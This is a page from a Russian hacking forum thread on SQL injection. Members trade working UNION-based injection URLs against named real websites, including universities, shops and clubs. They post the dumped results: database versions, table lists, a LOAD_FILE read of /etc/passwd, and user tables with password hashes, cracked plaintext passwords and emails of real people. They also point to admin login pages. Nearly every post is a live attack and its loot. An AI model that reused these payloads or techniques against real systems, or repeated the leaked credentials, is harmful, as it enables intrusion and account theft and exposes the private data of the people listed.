SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 250 of 798
  1. Lamersha

    Lamersha Member

    Joined:
    11 Dec 2007
    Messages:
    6
    Likes Received:
    6
    Reputations:
    0
    4.1.22
    telgaz_db
    [email protected]
    http://9955599.ru/mo_job.php?mo=sect&Id=-19+UNION+SELECT+1,2/*
     
    #4981 Lamersha, 5 Mar 2008
    2 people like this.
  2. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    http://www.naturamunda.lt
    Code:
    http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,version(),8,9/*
    tarpininka_nm@localhost
    5.0.45-community-log

    Идем дальше:
    Code:
    http://www.naturamunda.lt/index.php?page=news.php&id=99'+union+select+1,user(),3,4,5,6,TABLE_NAME,8,9+from+

INFORMATION_SCHEMA.TABLES/*
    30 таблиц, среди них:
    users_db
    personalas
    user_privileges     и др.


    http://sperling-coll.dk
    Code:
    http://sperling-coll.dk/?filenavn=varer.php4&traeid=-1+union+select+concat_ws(char(58),user(),version(),database())/*
    И читаем титул:
    Sperling - root@localhost:5.0.27:dbsperlingNY
    Думаю, проблем быть не должно =)

    А это Вам на съедение:
    Code:
    http://www.hajosalfred.hu/eng/news.php?id=-1+union+select+1,2,3,4,5+--+
    =)
     
    #4982 ЛифчиС5СВ, 5 Mar 2008
  3. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Code:
    http://www.milon.ru/index.phtml?id=-6+union+select+1,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

    Code:
    http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    Хеш рута вытащить не смог.
     
    #4983 MegaBits, 5 Mar 2008
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    MegaBits
    Вот рут ,но так-же как в моём предъидущем посте не всё понятно
    root:032c41e8435273a7 =letmein
    Запрос :
    _http://www.milon.ru/index.phtml?id=-6+union+select+1,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+mysql.user+limit+3,10/*
    или user или password вместе нет
     
    #4984 Kakoytoxaker, 5 Mar 2008
    1 person likes this.
  5. BizzyD

    BizzyD Elder - Старейшина

    Joined:
    2 Jun 2007
    Messages:
    209
    Likes Received:
    118
    Reputations:
    0
    Code:
    http://www.omantribune.com/index.php?page=news&id=99999+union+select+1,2,3,4,5,6,7,8,9/*
    [email protected]:eek:mantribune:4.1.22-max-log



    Code:
    http://www.turkystan.kz/page.php?page_id=14&number_id=99999+union+select+1,2,3,4/*
    turkesdb@hosting:turkesdb:4.1.22
     
    #4985 BizzyD, 5 Mar 2008
    1 person likes this.
  6. MegaBits

    MegaBits Elder - Старейшина

    Joined:
    30 Aug 2006
    Messages:
    151
    Likes Received:
    24
    Reputations:
    10
    Code:
    http://www.m-logos.ru/seminars/info.phtml?id=-727+union+select+1,2,3,4,concat_ws(char(58),user(),version()%20%20,database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    [email protected]:4.0.27-log:mlogos
     
    #4986 MegaBits, 5 Mar 2008
  7. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Только учусь!!!
    shop notebook.dn.ua

    Code:
    http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(database(),0x3a,version(),0x3a,user())/*
    godnua_newmarket:4.1.20:godnua_mark@localhost

    Code:
    http://notebook.dn.ua/?brand=-78/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,concat(fio,0x3a,mail)/**/from/**/users/*
    -------------------------------------------------
    там еще есть таблицы, но нужно подбирать
     
    #4987 samarin, 6 Mar 2008
    Last edited: 6 Mar 2008
    2 people like this.
  8. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    arm.st.uz
    _http://arm.st.uz/index.php?m=news&id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
    4.1.19-log:arm@localhost:arm
    admin:70222949cc0db89ab32c9969754d4758 pass:1290
    sk:70222949cc0db89ab32c9969754d4758 pass:1290
    arm:5bbc7cc2da7217ccaf66f733b3fef728 pass:11183 [email protected] pass:11183

    в админку не пускает, стоит привязка к ипу
     
    #4988 gibson, 6 Mar 2008
    1 person likes this.
  9. Lamersha

    Lamersha Member

    Joined:
    11 Dec 2007
    Messages:
    6
    Likes Received:
    6
    Reputations:
    0
    http://9955599.ru/jobsect.php?section=-5+union+select+null,version()/*
    [email protected]/4.1.22/telgaz_db
    если ктонить раскоыряет напишите плиз чтото у меня не получилось дальше((
     
    #4989 Lamersha, 6 Mar 2008
    1 person likes this.
  10. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Lamersha, по-моему, там нет ничего интересного
    Code:
    resume
  id
  name
  pay
  mark
  date
  city
  section
  age
vacancy
  id
city
section
    Хотя хз, мне лень дальше ковырять =)
     
    #4990 krypt3r, 6 Mar 2008
  11. sD0S

    sD0S New Member

    Joined:
    26 Feb 2008
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    PRIAMOS is a powerful SQL Injector & Scanner

    www.priamos-project.com/whatis.htm
     
    #4991 sD0S, 6 Mar 2008
  12. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.dixis.kz/index.php?shownews=true&nid=all&cat=-1+union+select+1,2,concat(version(),char(58),user(),char(58),database()),4,5,6,7,8,9,10+/*

    4.1.22-standard-log
    dixis_user@localhost
    dixis_shop
     
    #4992 truelamer, 6 Mar 2008
  13. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    upc.edu
    http://www.upc.edu/tercercicle/estudis/index_ambit.php?id_ambit=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database())/*
    4.0.24_Debian-10sarge1-log:intranet@localhost:tercercicle intranet@localhost

    Ну могу докрутить эти скули, вроде выводиться, а инфу показываеть не хочет
    library.uiuc.edu
    http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+123--

    spo.princeton.edu
    http://spo.princeton.edu/index.php?id=-1'+or+1=1/*

    ethology.ru
    5.0.45-log:[email protected]:u12802
    alex pass:11 [email protected]
    pass:183
    mike:183:p[email protected]
    prox:124:[email protected]
    gilburd:1324:eek:[email protected]
    voronova:23454:[email protected]
    labas:5321:[email protected]
    protopopov:5463:p[email protected]
    Danio:1098:[email protected]
    irina:4359:[email protected]
    grebenshikov:36574:[email protected]
    gerbek:gerbek123:[email protected]
     
    #4993 gibson, 6 Mar 2008
    Last edited: 6 Mar 2008
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    2 gibson

    Первая:

    _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+@@version--

    Microsoft SQL Server 2005 - 9.00.3054.00 (X64) Mar 23 2007 18:41:50 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)

    _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema.tables--

    SoyLinks
    NewLinksSoy
    NewLinksCorn

    _http://www.library.uiuc.edu/agx/agnic/soynic/info.php?id=-1'+union+select+table_name+from+information_schema.tables+WHERE+TABLE_NAME+NOT+IN+('SoyLinks','NewLinksSoy')--
    и т.д. мне дальше лень
    ---------------------------
    вторая:mysql

    _http://spo.princeton.edu/index.php?id=1'+order+by+23/*

    Скорее всего два Select столбца 23 ,а через Union ругается:

    The used SELECT statements have a different number of columns

    т.е. подзапросы
     
    #4994 Kakoytoxaker, 6 Mar 2008
    Last edited: 6 Mar 2008
    3 people like this.
  15. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    http://www.cyberbody.ru/shop.php?catid=1121000000000+UNION+SELECT+1,concat_ws(0x3a,username,user_password,user_email,user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+phpbb2_users/*
    все качки на одной страничке)))
     
    #4995 vp$, 7 Mar 2008
  16. neon_fx

    neon_fx Elder - Старейшина

    Joined:
    22 Feb 2008
    Messages:
    74
    Likes Received:
    32
    Reputations:
    0
    http://www.nsastutter.org/content/index.php?catid=-52/**/union/**/select/**/1,concat_ws(0x3a,User(),Database(),Version()),3,4,5/*

    [email protected]
    stutter
    4.0.25-standard-log
     
    #4996 neon_fx, 7 Mar 2008
    Last edited: 7 Mar 2008
  17. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    Киевский Рок Клуб
    http://www.rock.kiev.ua/arhiv/id.php?id=-99999+union+select+1,2,3,concat_
    ws(0x3a,id,login,password,fname,lname,email),5,6,7,8,9,10,11+from+users/*

    USER: rock@localhost
    VERSION: 5.0.32-Debian_7etch5-log
    DATABASE: rock

    1: DR-1:AkbcA:Ремиш:Дмитрий:[email protected]
    28:YK-1:nbyedbtkm:Юлия:Коломиец:[email protected]
    1657:YK-10:7qOAjTq6dN26udL:Комаров:Юрий:[email protected]

    Регистрация и админка тут:
    http://www.rock.kiev.ua/kontakt/index.php
     
    #4997 beerhack, 7 Mar 2008
    Last edited: 8 Mar 2008
    1 person likes this.
  18. sD0S

    sD0S New Member

    Joined:
    26 Feb 2008
    Messages:
    3
    Likes Received:
    2
    Reputations:
    0
    [PNphpBB2]
    table pn_phpbb_users:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,table_name,5,5,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/and/**/table_name/**/like/**/0x257573657225/**/limit/**/3,1/*

    column username:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257573657225/**/limit/**/1,1/*

    column user_password:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,column_name,5,5,5/**/from/**/information_schema.columns/**/where/**/table_name=0x706E5F70687062625F7573657273/**/and/**/column_name/**/like/**/0x257061737325/**/limit/**/0,1/*

    THE END:
    _http://albireo.lt/index.php?name=PNphpBB2&file=index&c=9999/**/union/**/select/**/5,concat(0x3C62722F3E,0x6964,0x3A,user_id,0x3C62722F3E,0x75736572,0x3A,username,0x3C62722F3E,0x70617373,0x3A,user_password),5,5,5/**/from/**/pn_phpbb_users/**/WHERE/**/user_id=2/*
     
    #4998 sD0S, 7 Mar 2008
    1 person likes this.
  19. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    Для "поклонников" Metallica...

    www.metpage.de

    metnews@localhost:5.0.20-max-log:metnews

    Доступна таблица wn_user:

    Tommy:3fac1eead50fcb46ec56e0df6452251e:suku3s43
    FrayedEnd:455018c4669f687ff757ffd4be3045cb:sebsucks
    TheUnforgivenII:e93ac9964ed9c0444cfbfa9f8a26429a:metfan6
    Elloy:c76f54e8d0db01297ac7a2e47be4cf13

    P.S. Пассы расшифровал с помошью md5.xek.cc, пользуемся...
     
    #4999 Saint-Sky, 7 Mar 2008
    1 person likes this.
  20. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(user(),char(58),version(),char(58),database()),5,6,7,8,9,10,11,12,13,14,15+from+admin/*

    vmovkkz_1@localhost
    4.1.22-standard-log
    vmovkkz_1
    ---------------------------------------------------

    http://www.vmo.kz/?start=news&id=-1+union+select+1,2,3,CONCAT(id,char(58),login,char(58),password),5,6,7,8,9,10,11,12,13,14,15+from+admin/*

    id:1
    login:admin
    passord:admin

    http://www.vmo.kz/admin.php
     
    #5000 truelamer, 7 Mar 2008
(You must log in or sign up to post here.)
Page 250 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.